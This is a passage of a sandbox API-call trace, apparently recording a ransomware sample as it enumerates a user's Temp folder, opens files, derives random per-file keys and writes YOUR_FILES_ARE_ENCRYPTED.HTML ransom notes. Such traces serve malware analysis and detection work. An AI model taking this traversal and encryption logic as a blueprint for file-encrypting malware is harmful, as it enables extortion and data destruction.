(pszPath="FXSAPIDebugLogFile.txt") returned=".txt" [0164.177] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.177] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\FXSAPIDebugLogFile.txt" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\fxsapidebuglogfile.txt"), 
dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0164.178] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="gen_py", cAlternateFileName="")) returned 1 [0164.178] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py") returned 49 [0164.178] GetProcessHeap () returned 0x270000 [0164.178] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0164.179] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py" [0164.179] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\*" [0164.180] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, 
nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0164.180] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.8", cAlternateFileName="")) returned 1 [0164.180] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8") returned 53 [0164.180] GetProcessHeap () returned 0x270000 [0164.180] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0164.182] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8" [0164.182] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\*") 
returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\*" [0164.182] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0164.182] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0164.182] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xa, dwReserved0=0x0, dwReserved1=0x60, cFileName="dicts.dat", cAlternateFileName="")) returned 1 [0164.183] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\dicts.dat") returned 63 [0164.183] lstrcmpW (lpString1="dicts.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.183] PathFindExtensionW 
(pszPath="dicts.dat") returned=".dat" [0164.183] lstrlenW (lpString=".dat") returned 4 [0164.183] PathFindExtensionW (pszPath="dicts.dat") returned=".dat" [0164.183] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0164.183] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\dicts.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\gen_py\\3.8\\dicts.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0164.184] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=10) returned 1 [0164.184] CloseHandle (hObject=0x58c) returned 1 [0164.184] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="__init__.py", cAlternateFileName="")) returned 1 [0164.184] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\__init__.py") returned 65 [0164.184] lstrcmpW (lpString1="__init__.py", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.184] PathFindExtensionW (pszPath="__init__.py") returned=".py" [0164.184] lstrlenW (lpString=".py") returned 3 [0164.184] PathFindExtensionW (pszPath="__init__.py") returned=".py" [0164.184] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0164.185] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\__init__.py" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\gen_py\\3.8\\__init__.py"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x58c [0164.185] GetFileSizeEx (in: hFile=0x58c, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=176) returned 1 [0164.185] CloseHandle (hObject=0x58c) returned 1 [0164.186] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0xb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="__init__.py", cAlternateFileName="")) returned 0 [0164.186] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0164.186] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0164.186] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\3.8\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\gen_py\\3.8\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5ac [0164.199] WriteFile (in: hFile=0x5ac, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0164.201] CloseHandle (hObject=0x5ac) returned 1 
[0164.201] GetProcessHeap () returned 0x270000 [0164.202] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0164.203] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaa8d7880, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaa8d7880, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaa8d7880, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="3.8", cAlternateFileName="")) returned 0 [0164.203] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.203] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 79 [0164.203] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\gen_py\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\gen_py\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0164.203] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.205] CloseHandle (hObject=0x5b0) returned 1 [0164.206] GetProcessHeap () returned 0x270000 [0164.207] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0164.207] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc3ab2b60, ftCreationTime.dwHighDateTime=0x1d7df33, 
ftLastAccessTime.dwLowDateTime=0xfa97f250, ftLastAccessTime.dwHighDateTime=0x1d7e6b5, ftLastWriteTime.dwLowDateTime=0xfa97f250, ftLastWriteTime.dwHighDateTime=0x1d7e6b5, nFileSizeHigh=0x0, nFileSizeLow=0x5c0b, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="JSCuyISn4Ff.swf", cAlternateFileName="JSCUYI~1.SWF")) returned 1 [0164.207] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\JSCuyISn4Ff.swf") returned 58 [0164.207] lstrcmpW (lpString1="JSCuyISn4Ff.swf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.207] PathFindExtensionW (pszPath="JSCuyISn4Ff.swf") returned=".swf" [0164.207] lstrlenW (lpString=".swf") returned 4 [0164.207] PathFindExtensionW (pszPath="JSCuyISn4Ff.swf") returned=".swf" [0164.207] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaad28060, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaad28060, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaad28060, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Low", cAlternateFileName="")) returned 1 [0164.207] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low") returned 46 [0164.207] GetProcessHeap () returned 0x270000 [0164.207] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0164.207] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low" [0164.207] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low", 
lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\*" [0164.207] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaad28060, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaad28060, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaad28060, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0164.208] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaad28060, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaad28060, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaad28060, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0164.208] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaad28060, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xaad28060, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaad28060, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0164.208] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.208] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 76 [0164.208] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\Low\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\low\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b0 [0164.209] WriteFile (in: hFile=0x5b0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.211] CloseHandle (hObject=0x5b0) returned 1 [0164.211] GetProcessHeap () returned 0x270000 [0164.212] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0164.212] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x589ebc90, ftCreationTime.dwHighDateTime=0x1d7d909, ftLastAccessTime.dwLowDateTime=0xd2c855a0, ftLastAccessTime.dwHighDateTime=0x1d7e3b1, ftLastWriteTime.dwLowDateTime=0xd2c855a0, ftLastWriteTime.dwHighDateTime=0x1d7e3b1, nFileSizeHigh=0x0, nFileSizeLow=0x92ba, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="lVFpx_ytKv.mp3", cAlternateFileName="LVFPX_~1.MP3")) returned 1 [0164.212] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3") returned 57 [0164.212] lstrcmpW (lpString1="lVFpx_ytKv.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.212] PathFindExtensionW (pszPath="lVFpx_ytKv.mp3") returned=".mp3" [0164.212] lstrlenW (lpString=".mp3") returned 4 [0164.212] PathFindExtensionW (pszPath="lVFpx_ytKv.mp3") returned=".mp3" [0164.212] SystemFunction036 (in: 
RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.212] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\lvfpx_ytkv.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0164.213] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=37562) returned 1 [0164.213] GetProcessHeap () returned 0x270000 [0164.213] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0164.215] wsprintfW (in: param_1=0x4ebd72a, param_2="%02X" | out: param_1="D0") returned 2 [0164.215] wsprintfW (in: param_1=0x4ebd72e, param_2="%02X" | out: param_1="10") returned 2 [0164.215] wsprintfW (in: param_1=0x4ebd732, param_2="%02X" | out: param_1="4A") returned 2 [0164.215] wsprintfW (in: param_1=0x4ebd736, param_2="%02X" | out: param_1="60") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd73a, param_2="%02X" | out: param_1="F2") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd73e, param_2="%02X" | out: param_1="74") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd742, param_2="%02X" | out: param_1="A0") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd746, param_2="%02X" | out: param_1="B7") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd74a, param_2="%02X" | out: param_1="A5") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd74e, param_2="%02X" | out: param_1="9E") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd752, param_2="%02X" | out: param_1="F8") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd756, param_2="%02X" | out: param_1="CF") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd75a, param_2="%02X" | out: param_1="B8") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd75e, param_2="%02X" | out: param_1="A3") returned 2 [0164.216] wsprintfW 
(in: param_1=0x4ebd762, param_2="%02X" | out: param_1="CC") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd766, param_2="%02X" | out: param_1="4B") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd76a, param_2="%02X" | out: param_1="C1") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd76e, param_2="%02X" | out: param_1="29") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd772, param_2="%02X" | out: param_1="7B") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd776, param_2="%02X" | out: param_1="F4") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd77a, param_2="%02X" | out: param_1="46") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd77e, param_2="%02X" | out: param_1="AC") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd782, param_2="%02X" | out: param_1="C8") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd786, param_2="%02X" | out: param_1="4F") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd78a, param_2="%02X" | out: param_1="4D") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd78e, param_2="%02X" | out: param_1="83") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd792, param_2="%02X" | out: param_1="68") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd796, param_2="%02X" | out: param_1="EC") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="08") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd79e, param_2="%02X" | out: param_1="A3") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="A8") returned 2 [0164.216] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="70") returned 2 [0164.217] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\lVFpx_ytKv.mp3" [0164.217] CreateIoCompletionPort (FileHandle=0x5b0, 
ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.217] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0164.217] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x350304f0, ftCreationTime.dwHighDateTime=0x1d7d8cb, ftLastAccessTime.dwLowDateTime=0x6e812a90, ftLastAccessTime.dwHighDateTime=0x1d7daba, ftLastWriteTime.dwLowDateTime=0x6e812a90, ftLastWriteTime.dwHighDateTime=0x1d7daba, nFileSizeHigh=0x0, nFileSizeLow=0x100e4, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="MNGTh.pps", cAlternateFileName="")) returned 1 [0164.217] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps") returned 52 [0164.217] lstrcmpW (lpString1="MNGTh.pps", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.217] PathFindExtensionW (pszPath="MNGTh.pps") returned=".pps" [0164.217] lstrlenW (lpString=".pps") returned 4 [0164.217] PathFindExtensionW (pszPath="MNGTh.pps") returned=".pps" [0164.217] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\MNGTh.pps" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\mngth.pps"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0164.218] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=65764) returned 1 [0164.218] GetProcessHeap () returned 0x270000 [0164.218] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0164.220] wsprintfW (in: param_1=0x4ebd72a, 
